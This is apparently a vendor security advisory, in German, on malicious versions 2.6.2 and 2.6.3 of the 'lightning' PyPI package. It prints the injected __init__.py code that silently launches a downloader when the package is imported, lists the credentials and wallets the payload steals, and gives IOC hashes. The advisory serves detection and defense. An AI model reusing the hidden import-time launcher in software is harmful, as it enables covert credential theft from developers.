Die Mini-Shai-Hulud-Supply-Chain-Kampagne hat sich auf PyPI ausgeweitet. Versionen 2.6.2 und 2.6.3 der beliebten Blitz Ein Python-Paket, das häufig zum Trainieren von PyTorch-Modellen verwendet wird, enthält bösartigen Code, der heimlich Anmeldedaten von Entwicklern, secrets und Kryptowährungs-Wallets abgreift.
Dies folgt auf zwei kürzlich erfolgte Angriffe im Rahmen derselben Kampagne: den Angriff auf die Bitwarden-CLI über npm und den Angriff auf SAP über npm. Derselbe Angreifer, derselbe Wurm – nun wechselt er von npm zu PyPI.
Wenn Sie lightning==2.6.2 oder lightning==2.6.3, gehen Sie davon aus, dass Ihr Computer kompromittiert ist.
So funktioniert's
Der Angriff wird direkt in __init__.py, die Datei, die beim Importieren des Pakets ausgeführt wird. Bevor der eigentliche Lightning-Code geladen wird, wird ein Hintergrund-Thread gestartet:
def _run_runtime() -> None:
_runtime_dir = os.path.join(os.path.dirname(__file__), "_runtime")
_start = os.path.join(_runtime_dir, "start.py")
if os.path.exists(_start):
subprocess.Popen(
[sys.executable, _start],
cwd=_runtime_dir,
stdout=subprocess.DEVNULL,
stderr=subprocess.DEVNULL,
)
threading.Thread(target=_run_runtime, daemon=True).start()Es führt aus start.py, ein plattformübergreifender Bun-Bootstrapper, der Ihr Betriebssystem und Ihre Architektur erkennt, die Bun-JavaScript-Laufzeitumgebung v1.3.13 herunterlädt und ausführt router_runtime.js, die eigentliche Nutzlast von 11 MB. Das gleiche Muster, das auch bei den jüngsten Angriffen auf Bitwarden und SAP zum Einsatz kam.
Was es stiehlt
SSH-Schlüssel, Shell-Verläufe (bash, zsh, Python, Node, MySQL, psql), .env Dateien, Git-Anmeldedaten, AWS-/GCP-/Azure-Anmeldedaten, Kubernetes- und Helm-Konfigurationen, Docker-Anmeldedaten, npm-Token und MCP-Konfigurationen. Kryptowährungs-Wallets, darunter Bitcoin, Litecoin, Monero, Dogecoin, Dash, Exodus, Atomic und Ledger. VPN-Anmeldedaten für NordVPN, ProtonVPN, CyberGhost, Windscribe und OpenVPN. Sitzungsdaten von Discord und Slack.
Alle gestohlenen Daten werden RSA verschlüsselt, bevor sie in öffentliche GitHub-Repositorys übertragen werden:
Wie Aikido dies Aikido
Wenn Sie ein Aikido-Benutzer sind, überprüfen Sie Ihren zentralen Feed und filtern Sie nach Malware-Problemen. Dies wird als kritisches Problem mit 100/100 angezeigt. Aikido führt nächtliche Rescans durch, aber wir empfehlen, jetzt einen manuellen Rescan auszulösen.
Wenn Sie noch kein Aikido-Benutzer sind, können Sie ein Konto erstellen und Ihre Repos verbinden. Unsere Malware-Abdeckung ist im kostenlosen Plan enthalten, keine Kreditkarte erforderlich.
Für eine umfassendere Abdeckung Ihres gesamten Teams bietet Aikidos Endpoint Protection Ihnen Transparenz und Kontrolle über die Softwarepakete, die auf den Geräten Ihres Teams installiert sind. Es deckt Browser-Erweiterungen, Code-Bibliotheken, IDE-Plugins und Build-Abhängigkeiten ab, alles an einem Ort. Stoppen Sie Malware, bevor sie installiert wird.
Denken Sie für zukünftige Sicherheit an Aikido Chain (Open Source). Safe Chain lässt sich in Ihren bestehenden Arbeitsablauf integrieren, fängt Befehle wie npm, npx, yarn, pnpm und pnpx ab und überprüft Pakete vor der Installation anhand von Aikido .
IOCs
- Paket:
lightning==2.6.2,lightning==2.6.3 - router_runtime.js
- SHA256:
5f5852b5f604369945118937b058e49064612ac69826e0adadca39a357dfb5b1
- SHA256:
- start.py
- SHA256:
8046a11187c135da6959862ff3846e99ad15462d2ec8a2f77a30ad53ebd5dcf2
- SHA256:
